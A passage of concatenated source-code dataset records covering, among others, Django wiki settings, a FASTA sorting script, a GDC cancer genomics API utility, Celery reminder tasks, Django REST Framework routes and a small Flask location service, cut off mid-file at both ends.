WIKI_REQUIRE_LOGIN_EDIT is False, then attachments can still be disallowed\nWIKI_ALLOW_ANON_ATTACHMENTS = getattr(settings, 'SIMPLE_WIKI_ALLOW_ANON_ATTACHMENTS', False)\n\n# Attachments are automatically stored with a dummy extension and delivered\n# back to the user with their original extension.\n# This setting does not add server security, but might add user security\n# if set -- or force users to use standard formats, which might also\n# be a good idea.\n# Example: ('pdf', 'doc', 'gif', 'jpeg', 'jpg', 'png')\nWIKI_ATTACHMENTS_ALLOWED_EXTENSIONS = getattr(settings, 'SIMPLE_WIKI_ATTACHMENTS_ALLOWED_EXTENSIONS',\n                                              None)\n\n# At the moment this variable should not be modified, because\n# it breaks compatibility with the normal Django FileField and uploading\n# from the admin interface.\nWIKI_ATTACHMENTS_ROOT = settings.MEDIA_ROOT\n\n
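# Maximum size allowed for a single attachment upload, in bytes.\n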
# Bytes! Default: 1 MB.\nWIKI_ATTACHMENTS_MAX = getattr(settings, 'SIMPLE_WIKI_ATTACHMENTS_MAX',\n                               1 * 1024 * 1024)\n \n####################\n# AESTHETICS       #\n####################\n\n# Planned features\nWIKI_PAGE_WIDTH = getattr(settings, 'SIMPLE_WIKI_PAGE_WIDTH', \"100%\")\nWIKI_PAGE_ALIGN = getattr(settings, 'SIMPLE_WIKI_PAGE_ALIGN', \"center\")\n","sub_path":"infolab/simplewiki/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"532684866","text":"import argparse\nimport logging\nimport re\nfrom Bio import SeqIO\n\ndef get_args():\n    \"\"\"\n    Get arguments from command line with argparse.\n    \"\"\"\n    parser = argparse.ArgumentParser(\n        prog='Sort-Fasta-Records-Biopython.py',\n        description=\"\"\"Sort all entries in a fasta file by order of record name.\"\"\")\n\n    parser.add_argument(\"-f\", \"--fasta\",\n                        required=True,\n                        help=\"The FASTA file to sort.\")\n    \n    parser.add_argument(\"-o\", \"--outfile\",\n                        required=True,\n                        help=\"The name of the output FASTA file (example: output.fasta).\")\n    \n    parser.add_argument(\"-l\", \"--logfile\",\n                        required=True,\n                        help=\"The name of the log file to write.\")\n\n    return parser.parse_args()\n\ndef setup_logging(logfile):\n    # set up logging to file\n    logging.basicConfig(filename=logfile,\n                        format=\"%(levelname)s: %(asctime)s: %(message)s\",\n                        datefmt='%d-%b-%y %H:%M:%S',\n                        level=logging.DEBUG)\n\ndef index_fasta(f):\n    \"\"\"\n    Use SeqIO to index the fasta file (f), which may be too big\n    to parse into a list. Returns a dictionary-like structure,\n    with seq names as keys and seqs as values.\n\n    :param f: path to fasta file\n    :return: dictionary-like structure of fasta records\n    \"\"\"\n    logging.info(\"index_fasta: Beginning to index fasta file.\")\n    records = SeqIO.index(f, \"fasta\")\n    logging.info(\"index_fasta: Found {:,} records.\".format(len(records)))\n    logging.info(\"index_fasta: Completed indexing.\")\n\n    return records\n\ndef sort_records(records):\n    \"\"\"\n    Returns a sorted list of the sequence names in fasta.\n\n    :param records: records obtained from index_fasta\n    :return: list of sorted sequence names\n    \"\"\"\n    logging.info(\"sort_records: Beginning sequence name sorting.\")\n    convert = lambda text: int(text) if text.isdigit() else text\n    alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n    ordered_names = sorted(list(records), key = alphanum_key)\n    logging.info(\"sort_records: Completed sorting.\")\n    #for n in ordered_names:\n    #    print(\"{:,}\".format(int(n.split('/')[1])))\n    return ordered_names\n\ndef write_records(records, ordered_names, outfile):\n    \"\"\"\n    Write output fasta.\n    :param records: dictionary-like structure from index_fasta\n    :param ordered_names: list of sequence names, in sorted order\n    :param outfile: name of output file to write\n    :return: None\n    \"\"\"\n    logging.info(\"write_records: Beginning to write fasta file.\")\n    rec_list = []\n    rec_count = int(1)\n    with open(outfile, 'a') as fhout:\n        for n in ordered_names:\n            rec_list.append(records[n].format(\"fasta\"))\n            if len(rec_list) > 50000:\n                fhout.write(\"\".join(rec_list))\n                rec_list = []\n                rec_count += 1\n        fhout.write(\"\".join(rec_list))\n    \n    logging.info(\"write_records: Completed writing.\")\n\n\ndef main():\n    args = get_args()\n    setup_logging(args.logfile)\n    records = index_fasta(args.fasta)\n    ordered_names = sort_records(records)\n    write_records(records, ordered_names, args.outfile)\n\nif __name__ == '__main__':\n
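    # parse arguments, then index, sort, and write the records\n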
    main()\n","sub_path":"Taxonomic-Profiling-Nucleotide/scripts/Sort-Fasta-Records-BioPython.py","file_name":"Sort-Fasta-Records-BioPython.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"514330690","text":"import os\nimport tornado.web\nfrom views import Start,Shops,Login,Register,Filter\nfrom webAPI import LoginWeb,move,RegisterWeb,FilterWeb\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nSETTINGS = {\n    \"template_path\": os.path.join(BASE_DIR, \"templates\"),\n    \"static_path\": os.path.join(BASE_DIR, \"static\")\n}\n\nHANDLERS = [\n    (r\"/\", Start),\n    (r\"/login\", Login),\n    (r\"/ajax/login\", LoginWeb),\n    (r\"/shop\", Start),\n    (r\"/ajax/shop\", move),\n    (r\"/register\",Register),\n    (r\"/ajax/register\",RegisterWeb),\n    (r\"/filter\",Filter),\n    (r\"/ajax/filter\",FilterWeb),\n]\n\nUI_MODULES={\n    'Shop': Shops\n}\n\napplication = tornado.web.Application(\n    handlers = HANDLERS,\n    ui_modules=UI_MODULES,\n**SETTINGS)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"311938000","text":"import random\nimport time\nimport sys\n\ndef random_guessing():\n    number=random.randint(1,10)\n    print('random number ',number)\n    while True:\n        try:\n            my_input=int(input('Input '))\n            if my_input>=1 and my_input<=10:\n                if my_input==number:\n                    print('Hurrrayyy..... You are a Genius ...')\n                    break\n                else:\n                    print('Try Again')\n                    continue\n            else:\n                print('Hey bro, I said Enter 1~10')\n                continue\n        except ValueError:\n            print('Please enter a number')\n            continue\n\n\nrandom_guessing()\n\n\nwhile True:\n    x=input('You want to play again [Y/N]').lower()\n    if x=='y':\n        random_guessing()\n        continue\n    elif x=='n':\n        print('Exit')\n        sys.exit()\n    else:\n        print('Try to enter Y/N')\n        continue\n    \ntime.sleep(5)\n    \n\n\n","sub_path":"Guessing_Game.py","file_name":"Guessing_Game.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399561678","text":"import re\nimport gzip\nimport shutil\nimport requests\nimport json\nimport numpy as np\nimport pandas as pd\nimport os\nimport collections\nimport h5py\nfrom scipy import sparse\nimport csv\n\n# main gdc api query function\ndef get_projects_info(project_names):\n    '''\n    a method for retrieving data about cases and their related samples for specified gdc projects.\n    The method looks for which of the projects specified actually exist in the GDC and then, for each\n    of the projects, retrieves all the cases with data about them like demographic and data about\n    samples related to each case.\n    \n    Input:\n        List of project names for which data should be retrieved\n    \n    Output:\n        dict:\n            data dict: data in the form of a dictionary with the structure: {project_name: {case_id: {data about the case}}}\n            image to sample: mapping from image file name to sample id for matching with labels\n            case to images: mapping from case id to list of associated images for dataset creation\n            labels: label dataframe\n            mutational signatures: mutational signatures dataframe\n            hugo symbols: hugo symbols dataframe\n    '''\n    \n    #check if project_names is a list of strings\n    if not(isinstance(project_names,list) and all(isinstance(i,str) for i in project_names)):\n        raise TypeError(\"project_names expects a list of strings\")\n    \n    #define api endpoints\n
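    # /cases returns case-level metadata; /projects is used below to validate project ids\n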
    cases_endpt = 'https://api.gdc.cancer.gov/cases'\n    projects_endpt = 'https://api.gdc.cancer.gov/projects'\n    \n    \n    #check which of the specified project names are in gdc\n    print(\"looking for project names in GDC database.\")\n    \n    filters = {\n        \"op\":\"in\",\n        \"content\":{\n            \"field\":\"project_id\",\n            \"value\":project_names\n        }\n    }\n    params = {\n        \"filters\": json.dumps(filters),\n        \"fields\":\"project_id\",\n        \"format\":\"json\",\n        \"pretty\":\"true\",\n    }\n    \n    response = requests.get(projects_endpt, params = params)\n    response = json.loads(response.content.decode(\"utf-8\"))\n    print(80*'-')\n    \n    if not(response['warnings']=={}):\n        print(\"warnings:\")\n        print(response['warnings'])\n    \n    found_projects = list(map(lambda x: x['project_id'],response['data']['hits']))\n    print(\"Projects found in GDC:\",found_projects)\n    out_samples = []\n    projects_data={}\n    image_to_sample={}\n    case_to_images={}\n    out_hugos = []\n    all_barcodes = []\n    \n    #mutational signature file for the entire tcga dataset\n    signatures = pd.read_csv(os.path.join(\"manifest\", 'TCGA_WES_sigProfiler_SBS_signatures_in_samples.csv'))\n    signatures['case_id'] = signatures['Sample Names'].apply(lambda x : '-'.join(x.split('-')[:3]))\n    signatures = signatures.iloc[:,3:]\n    #search for cases for each project\n    print(80*'-')\n    for project in found_projects:\n        \n        print(\"looking for cases for project:\",project)\n        \n        filters = {\n            \"op\":\"=\",\n            \"content\":{\n                \"field\":\"project.project_id\",\n                \"value\":project\n            }\n        }\n        \n        fields = ['case_id','project.project_id',\"submitter_id\",\"files.file_id\",\"files.file_name\"]\n        fields = ','.join(fields)\n        \n        params = {\n            \"filters\":json.dumps(filters),\n            \"fields\" :fields,\n            \"format\" :\"json\",\n            \"pretty\" :\"true\",\n            \"size\" : \"1100\",\n            \"expand\" : \"demographic,samples,files,diagnoses\"\n        }\n\n        response = requests.get(cases_endpt, params = params)\n        cases = json.loads(response.content.decode(\"utf-8\"))\n        print(\"retrieved\",cases['data']['pagination']['count'],\"cases in the\",project,\"project\")\n        \n        \n        #add cases to dictionary\n        found_cases = cases['data']['hits']\n        out_cases = {}\n        for case in found_cases:\n            \n            #section for creating a dataframe\n            for sample in case['samples']:\n                sample_dict = {}\n                sample_dict['case_barcode'] = case['submitter_id']\n                sample_dict['project'] = case['project']['project_id']\n                sample_dict['case_id'] = case['case_id']\n\n                #add demographic data for sample\n                demographic_dict = case.get('demographic',{})\n                for key in demographic_dict:\n                    sample_dict[\"demographic.\"+key] = demographic_dict[key]\n\n                #add diagnose data for sample\n                diagnoses_dict = case.get('diagnoses',{})\n                #the diagnostic value is a list with either length 0 or 1; if it is an empty list, change it to an empty\n                #dict for convenience\n                if len(diagnoses_dict)>0:\n                    diagnoses_dict = diagnoses_dict[0]\n                else:\n                    diagnoses_dict = {}\n                for key in diagnoses_dict:\n                    sample_dict[\"diagnose.\"+key] = diagnoses_dict[key]\n                sample_dict['sample.barcode']=sample['submitter_id']\n                #print(sample['submitter_id'])\n                for key in sample:\n                    if key != 'submitter_id':\n                        sample_dict['sample.'+key]=sample[key]\n                #print(sample_dict['sample.barcode'])\n                out_samples.append(sample_dict)\n            \n            \n            #dict section\n            demographic = case.get('demographic',{})\n            samples = case.get('samples',[])\n            mutational_signatures = signatures[signatures['case_id']==case['submitter_id']]\n            \n            if mutational_signatures.shape[0] != 0:\n                mutational_signatures = mutational_signatures.iloc[0,:-1].to_list()\n            else:\n                mutational_signatures = []\n\n
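            # assemble the per-case record: demographics, samples, an empty hugo list, and signatures\n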
            out_cases[case['submitter_id']]={\"demographic\":demographic,\"samples\":samples,\n                                             \"case_id\":case['case_id'],\"hugo_symbols\":[],\n                                             \"mutational_signature\":mutational_signatures,\n                                             }\n            \n            #add slide image file names to cases for mapping from cases to images\n            for sample in out_cases[case['submitter_id']]['samples']:\n                #sample_mut_sig = \n                sample['image_files']=[]\n            \n            images_for_case = []\n            for file in case['files']:\n                if file['data_format']=='SVS':\n                    sample_id = '-'.join(file['submitter_id'].split('-')[:4])\n                    images_for_case.append(file['file_name'])\n                    image_to_sample[file['file_name']] = sample_id\n                    for sample in out_cases[case['submitter_id']]['samples']:\n                        if sample['submitter_id']==sample_id:\n                            sample['image_files'].append(file['file_name'])\n            #add list of image file names to mapping for that case \n            if images_for_case != []:\n                case_to_images[case['submitter_id']]=images_for_case\n            \n            #delete samples with no image files\n            for i,sample in enumerate(out_cases[case['submitter_id']]['samples']):\n                if sample['image_files']==[]:\n                    del out_cases[case['submitter_id']]['samples'][i]\n            \n            #delete cases with no samples\n            if out_cases[case['submitter_id']]['samples'] == []:\n                del out_cases[case['submitter_id']]\n        \n        #download maf file to add hugo symbols to each case\n        print(\"downloading maf file for project\",project)\n        zip_file,maf_file = download_maf_for_proj(project)\n        \n        #if a maf file for the given project was found and extracted, parse it and attach hugo symbols to the cases\n        if maf_file != None:\n            print(\"downloaded file:\",zip_file)\n            print(\"file extracted to:\",maf_file)\n\n            with open(maf_file) as maf:\n                rd = csv.reader(maf,delimiter='\\t', quotechar='\"')\n                #skip headers\n                for i in range(6):\n                    next(rd)\n                #add hugo symbols to each case\n                for line in rd:\n                    symbol = line[0]\n                    case_id = '-'.join(line[15].split('-')[:3])\n                    out_cases[case_id]['hugo_symbols'].append(symbol)\n\n        #add cases to hugo symbol dataframe\n        all_barcodes = all_barcodes+list(out_cases.keys())\n        for case in out_cases:\n            symbols = out_cases[case]['hugo_symbols']\n            symbols = dict(collections.Counter(symbols))\n            out_hugos.append(symbols)\n        \n        #add the cases dictionary for given project to the projects dictionary\n        projects_data[project]=out_cases\n        print(80*'-')\n    \n    #create sparse dataframe for hugos\n    hugos = dicts_to_sparse(out_hugos)\n    hugos['case_barcode'] = all_barcodes\n\n    samples = pd.DataFrame.from_records(out_samples)\n    samples = samples.fillna(np.nan)\n    print(\"done\") \n    return {\"data dict\":projects_data,\"image to sample\":image_to_sample,\n            \"case to images\":case_to_images,\"labels\":samples, \"mutational signatures\" : signatures,\n            \"hugo symbols\" : hugos}\n\n#file download functionality\ndef download_extract(file_id,project_name):\n    download_endpt = \"https://api.gdc.cancer.gov/data/{}\".format(file_id)\n    response = requests.get(download_endpt, headers = {\"Content-Type\": \"application/json\"})\n    response_head_cd = response.headers[\"Content-Disposition\"]\n    file_name = os.path.join(\"manifest\", re.findall(\"filename=(.+)\", response_head_cd)[0])\n    out_name = os.path.join(\"manifest\", project_name+'-maf.tsv')\n    \n    with open(file_name, \"wb\") as output_file:\n        output_file.write(response.content)\n    \n    with gzip.open(file_name, 'rb') as f_in:\n        with open(out_name, 'wb') as f_out:\n            shutil.copyfileobj(f_in, f_out)\n    return file_name,out_name\n\ndef download_maf_for_proj(project_name):\n    files_endpt = \"https://api.gdc.cancer.gov/files\"\n\n    workflow = {\"op\":\"=\",\n                \"content\":{\n                    \"field\":\"analysis.workflow_type\",\n
\"value\":\"MuSE Variant Aggregation and Masking\"\n }\n }\n\n category = {\"op\":\"=\",\n \"content\":{\n \"field\":\"data_category\",\n \"value\":\"Simple Nucleotide Variation\"\n }\n }\n\n dat_type = {\"op\":\"=\",\n \"content\":{\n \"field\":\"data_type\",\n \"value\":\"Masked Somatic Mutation\"\n }\n }\n proj = {\"op\":\"=\",\n \"content\":{\n \"field\":\"cases.project.project_id\",\n \"value\":project_name\n }\n }\n filters = {\n \"op\":\"and\",\n \"content\":[workflow,dat_type,category,proj]\n }\n params = {\n \"filters\":json.dumps(filters),\n \"fields\" : \"data_type,data_category,file_id,cases.project.project_id\",\n \"format\" :\"json\",\n \"pretty\" :\"true\",\n \"size\" : \"5\",\n \"expand\" : \"analysis\",\n }\n\n response = requests.get(files_endpt, params = params)\n file_data = json.loads(response.content.decode(\"utf-8\"))\n \n #if no maf file found do nothing\n if(file_data['data']['pagination']['total']==0):\n print(\"no maf file found for project\",project_name)\n return None,None\n \n file_id = file_data['data']['hits'][0]['file_id']\n return download_extract(file_id,project_name)\n\ndef download_image(file_name,path=\"\"):\n file_path = os.path.join(path,file_name)\n #check if image already exists\n if not os.path.exists(file_path):\n if not os.path.exists(path):\n os.makedirs(path)\n files_endpt = \"https://api.gdc.cancer.gov/files\"\n\n context = {\"op\":\"=\",\n \"content\":{\n \"field\":\"file_name\",\n \"value\":file_name\n }\n }\n params = {\n \"filters\":json.dumps(context),\n \"fields\" : \"file_id\",\n \"format\" :\"json\",\n \"pretty\" :\"true\",\n \"size\" : \"5\",\n }\n\n response = requests.get(files_endpt, params = params)\n file_data = json.loads(response.content.decode(\"utf-8\"))\n file_id = file_data['data']['hits'][0]['file_id']\n\n data_endpt = \"https://api.gdc.cancer.gov/data/{}\".format(file_id)\n print(\"downloading image {} to path {}\".format(file_name,file_path))\n response = requests.get(data_endpt, headers = {\"Content-Type\": \"application/json\"})\n\n with open(file_path, \"wb\") as output_file:\n output_file.write(response.content)\n else:\n print(\"{} already exists, not downloading anything\".format(file_path))\n\ndef dicts_to_sparse(dicts):\n symbol_to_col = {}\n idx = 0\n #create maping from hugo symbol to col in coo matrix\n for case in dicts:\n for symbol in case:\n if symbol not in symbol_to_col:\n symbol_to_col[symbol]=idx\n idx+=1\n row = []\n col = []\n data = []\n #build arrays\n row_idx=0\n for case in dicts:\n for symbol in case:\n row.append(row_idx)\n col.append(symbol_to_col[symbol])\n data.append(case[symbol])\n row_idx += 1\n #build coo\n coo = sparse.coo_matrix((data,(row,col)))\n #convert coo to df\n df = pd.DataFrame.sparse.from_spmatrix(coo,columns=list(symbol_to_col.keys()))\n return df\n\ndef store_hugo(file,hugo,overwrite=False):\n #store a hugo symbol dataframe in an existing h5 file\n hugo_counts = hugo.drop(\"case_barcode\",axis=1)\n hugo_barcodes = hugo['case_barcode'].to_numpy().astype('S')\n hugo_counts_coo = hugo_counts.sparse.to_coo()\n\n #del existing hugo symbols group if overwrite is true\n if 'hugo_symbols' in file:\n print('hugo symbols already stored in this file') \n if overwrite:\n print('overwriting')\n del file['hugo_symbols']\n else:\n return\n\n #store hugos in h5 file\n file.create_group('hugo_symbols')\n hugo = file['hugo_symbols']\n #store values\n hugo.create_dataset('data', data=hugo_counts_coo.data)\n hugo.create_dataset('col', data=hugo_counts_coo.col)\n hugo.create_dataset('row', 
data=hugo_counts_coo.row)\n hugo.attrs['shape'] = hugo_counts.shape\n #store barcodes\n hugo.create_dataset('barcodes',data=hugo_barcodes)\n #store names\n hugo.create_dataset('names',data=hugo_counts.columns.to_numpy().astype('S'))\n\ndef load_hugo(file):\n #reconstruct hugo symbol dataframe from opened h5 file\n if not 'hugo_symbols' in file:\n print('hugo symbols data not in file')\n return None\n else:\n hugo = file['hugo_symbols']\n #restore the count values\n matrix = sparse.coo_matrix((hugo['data'],(hugo['row'],hugo['col'])),hugo.attrs['shape'])\n cols = np.array(hugo['names']).astype(str)\n df = pd.DataFrame.sparse.from_spmatrix(matrix,columns=cols)\n #add barcodes\n barcodes = np.array(hugo['barcodes']).astype(str)\n df['case_barcode']=barcodes\n return df ","sub_path":"src/labeling_util.py","file_name":"labeling_util.py","file_ext":"py","file_size_in_byte":15351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"257253261","text":"# -*- coding: utf-8 -*-\nimport json\nfrom celery_app import app\nfrom celery.utils.log import get_task_logger\nfrom celery_tasks import SAK_URL, SAK_VERSION\nimport requests\nfrom flod_common.session.utils import make_superuser_auth_cookie\n\nlogger = get_task_logger(__name__)\n\n\ndef send_reminder(url, minutes=None, reminder_slack=None, min_minutes_since_last_reminder=None):\n if minutes is None or not isinstance(minutes, int):\n logger.error(\"send_soknad_reminder_task - antall minutter ikke satt\")\n return\n\n data = {'minutes': minutes}\n if reminder_slack is not None:\n data.update(reminder_slack=reminder_slack)\n if min_minutes_since_last_reminder is not None:\n data.update(min_minutes_since_last_reminder=min_minutes_since_last_reminder)\n\n auth_token_cookie = make_superuser_auth_cookie()\n headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\n return requests.post(url, data=json.dumps(data), cookies=auth_token_cookie, headers=headers)\n\n\n@app.task\ndef send_soknad_reminder_task(minutes=None, reminder_slack=None, min_minutes_since_last_reminder=None):\n url = '%s/api/%s/purringer/soknader/' % (SAK_URL, SAK_VERSION)\n response = send_reminder(url, minutes, reminder_slack, min_minutes_since_last_reminder)\n\n if response.status_code != 201:\n logger.error(\"Could not trigger the sending of soknad reminders, response has status %s!\\n response=%s\"\n % (response.status_code, response))\n\n\n@app.task\ndef send_rapport_reminder_task(minutes=None, reminder_slack=None, min_minutes_since_last_reminder=None):\n url = '%s/api/%s/purringer/rapporter/' % (SAK_URL, SAK_VERSION)\n response = send_reminder(url, minutes, reminder_slack, min_minutes_since_last_reminder)\n\n if response.status_code != 201:\n logger.error(\"Could not trigger the sending of rapport reminders, response has status %s!\\n response=%s\"\n % (response.status_code, response))\n","sub_path":"flod_tasks/celery_tasks/reminder_tasks.py","file_name":"reminder_tasks.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"122619973","text":"###################################\n#\n# \n#\n###################################\n\nimport requests\n\nHost = 'http://127.0.0.1:8000/'\n\nurls_update = 'api/updates/'\nupdate_date = '2018-08-12'\nupdate_time = '13:00:00'\n#update_hook = update_time + '@' + update_time\npayload_update = {'notes_text': 'rilevazione di prova da client', 'pub_date': update_date, 'pub_hour': update_time}\nr 
= requests.post(Host + urls_update, data = payload_update)\nprint('URL request' + r.url)\nprint('Request status code: ' + str(r.status_code))\nprint('Response header:' + str(r.headers))\nupdate_content = r.json()\nupdate_pk = update_content['pk']\nprint('Content response:' + str(update_content))\nprint('Content pk value:' + str(update_pk))\n\nurls_category = 'api/categories/'\npayload_category = {'name': 'Titoli governativi', 'description': 'Tassi e Spread principali titoli benchmark', 'update': update_pk}\nr = requests.post(Host + urls_category, data = payload_category)\nprint('URL request' + r.url)\nprint('Request status code: ' + str(r.status_code))\n\n#payload_category = {'name': 'Tassi', 'description': 'Principali punti della curva EUR IRS', 'update': update_hook}\n#r = requests.post(Host + urls_category, data = payload_category)\n#print('URL request' + r.url)\n#print('Request status code: ' + str(r.status_code))\n\n\n#urls_symbol = 'api/symbol/'\n#payload_symbol = {'notes_text': 'rilevazione di prova da client', 'pub_date': '2018-08-03', 'pub_hour': '08:00:00'}\n#r = requests.post(Host + urls_symbol, data = payload_symbol)\n#print('URL request' + r.url)\n#print('Request status code: ' + str(r.status_code))\n\n#urls_value = 'api/value/'\n#payload_value = {'notes_text': 'rilevazione di prova da client', 'pub_date': '2018-08-03', 'pub_hour': '08:00:00'}\n#r = requests.post(Host + urls_value, data = payload_value)\n#print('URL request' + r.url)\n#print('Request status code: ' + str(r.status_code))","sub_path":"old/marketupdate_rest_client.py","file_name":"marketupdate_rest_client.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"386048967","text":"\"\"\"lab1_webproject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.generic import TemplateView\nfrom rest_framework import routers\nfrom rest_framework.schemas import get_schema_view\nfrom lab1_app import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'language', views.LanguageViewSet, 'language')\nrouter.register(r'word', views.WordViewSet, 'word')\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('account/register', views.UserCreate.as_view()),\n path('admin/', admin.site.urls),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('lab/', include('lab1_app.urls')),\n path('openapi',\n get_schema_view(\n title=\"lab1_app\",\n description=\"API for Dictionary, \"\n \"the API can store words and their translation\",\n version=\"1.0.0\"\n ),\n name='openapi-schema'),\n path('redoc/',\n TemplateView.as_view(\n template_name='redoc.html',\n extra_context={'schema_url': 'openapi-schema'}\n ),\n name='redoc'),\n\n path('swagger-ui/',\n TemplateView.as_view(\n template_name='swagger-ui.html',\n extra_context={'schema_url': 'openapi-schema'}\n ),\n name='swagger-ui'),\n]\n","sub_path":"lab1_webproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"152392901","text":"from flask import Flask, request\nimport random\nfrom werkzeug.serving import run_simple\napp = Flask(__name__)\napp.debug = True\n\n#######################################################\n#\n# Ruta: http://localhost:5001/\n# Descripcion:\n# Esta ruta muestra informacion sobre el WebServer Rastreo\n#\n#######################################################\n@app.route('/')\ndef Principal():\n return 'Este es el WebService Rastreo!'\n\n#######################################################\n#\n# Ruta: 'http://localhost:5001/SolicitudRastreoCliente/\n# Descripcion:\n# Esta ruta toma el codigo del cliente del cual se solicita\n# el rastreo, devuelve su longitud y latitud.\n#\n#######################################################\n@app.route('/SolicitudRastreoCliente/')\ndef SolicitudRastreoCliente():\n codigoCliente=request.args['codigoCliente']\n longitud = str(random.randint(1, 50000))\n latitud = str(random.randint(1, 50000))\n return \"El cliente [\"+codigoCliente+\"] esta en la siguiente ubicacion. longitud [\"+longitud+\"] y latitud [\"+latitud+\"] \"\n\n#######################################################\n#\n# Ruta: 'http://localhost:5001/SolicitudRastreoPiloto/\n# Descripcion:\n# Esta ruta toma el codigo del piloto del cual se solicita\n# el rastreo, devuelve su longitud y latitud.\n#\n#######################################################\n@app.route('/SolicitudRastreoPiloto/')\ndef SolicitudRastreoPiloto():\n codigoPiloto=request.args['codigoPiloto']\n longitud = str(random.randint(1, 50000))\n latitud = str(random.randint(1, 50000))\n return \"El piloto [\"+codigoPiloto+\"] esta en la siguiente ubicacion. 
longitud [\"+longitud+\"] y latitud [\"+latitud+\"] \"\n\nif __name__ == \"__main__\":\n run_simple('localhost', 5001, app,\n use_reloader=True, use_debugger=True, use_evalex=True)","sub_path":"Rastreo/microservicioRastreo.py","file_name":"microservicioRastreo.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"254067077","text":"\"\"\"-------------------------------------------------------------------------------------------------\nScript Name: Speech to Text GCloud\nScript Author: Andoni Sooklaris\nDate: 2019-02-04\nUpdated:\n -2019-09-24\n\nTranscribe an audio file using the Google Cloud Speech engine.\n-------------------------------------------------------------------------------------------------\"\"\"\n\nimport argparse\nfrom os.path import join, expanduser\nfrom pydoni.scripts.audio import SpeechToText\n\ndef initialize_argparser():\n \"\"\"\n Initiate program argument parser.\n\n Returns:\n Namespace\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Program argument parser')\n parser._action_groups.pop()\n\n required = parser.add_argument_group('required arguments')\n required.add_argument('--audiofile',type=str, required=True,\n help='Audio file to transcribe')\n required.add_argument('--outfile',type=str, required=True,\n help='Output textfile')\n required.add_argument('--method',type=str, required=False, default='gcs',\n help=\"Method to use for audiofile transcription, one of ['gcs'] (default: {gcs})\")\n required.add_argument('--gcs_split_threshold',type=str, required=False, default=55,\n help='Maximum audio clip size in seconds, if clip exceeds this length it will be split using class method `split()` (default: {55})')\n required.add_argument('--google_application_credentials_json',type=str, required=False,\n default=join(expanduser('~'), 'google-cloud-sdk', 'doni-speech-to-text-ebfb6aece133.json'),\n help='Path to google application credentials file')\n\n optional = parser.add_argument_group('optional arguments')\n optional.add_argument('--apply_correction', action='store_true', default=True,\n help='Apply smart dictation, smart capitalize, remove excess spaces and any manual corrections to transcript (default: {True})')\n optional.add_argument('--verbose', action='store_true', default=False,\n help='Print messages to STDOUT (default: {False})')\n\n return parser.parse_args()\n\n\nns = initialize_argparser()\nSpeechToText(\n audiofile=ns.audiofile,\n outfile=ns.outfile,\n method=ns.method,\n gcs_split_threshold=ns.gcs_split_threshold,\n google_application_credentials_json=ns.google_application_credentials_json,\n apply_correction=ns.apply_correction,\n verbose=ns.verbose\n).run()\n","sub_path":"audio/SpeechToText.py","file_name":"SpeechToText.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"458087440","text":"# forward stage\nfrom __future__ import division\ndef data(confidence, Param, iteration, fcf_Operator): \n\n #import InputFilesForw\n import pyomo.environ as pyomo\n from pyomo.opt import SolverFactory\n from pyomo.core import Suffix\n from utils.parameters import pyomoset, pyomohydro, pyomogates\n from scripts.pyomo_model import obj_function\n from scripts.pyomo_model import load_balance\n from scripts.pyomo_model import energy_conservationF as energy_conservation\n from scripts.pyomo_model import storage_function, costtogo\n from scripts.pyomo_model import 
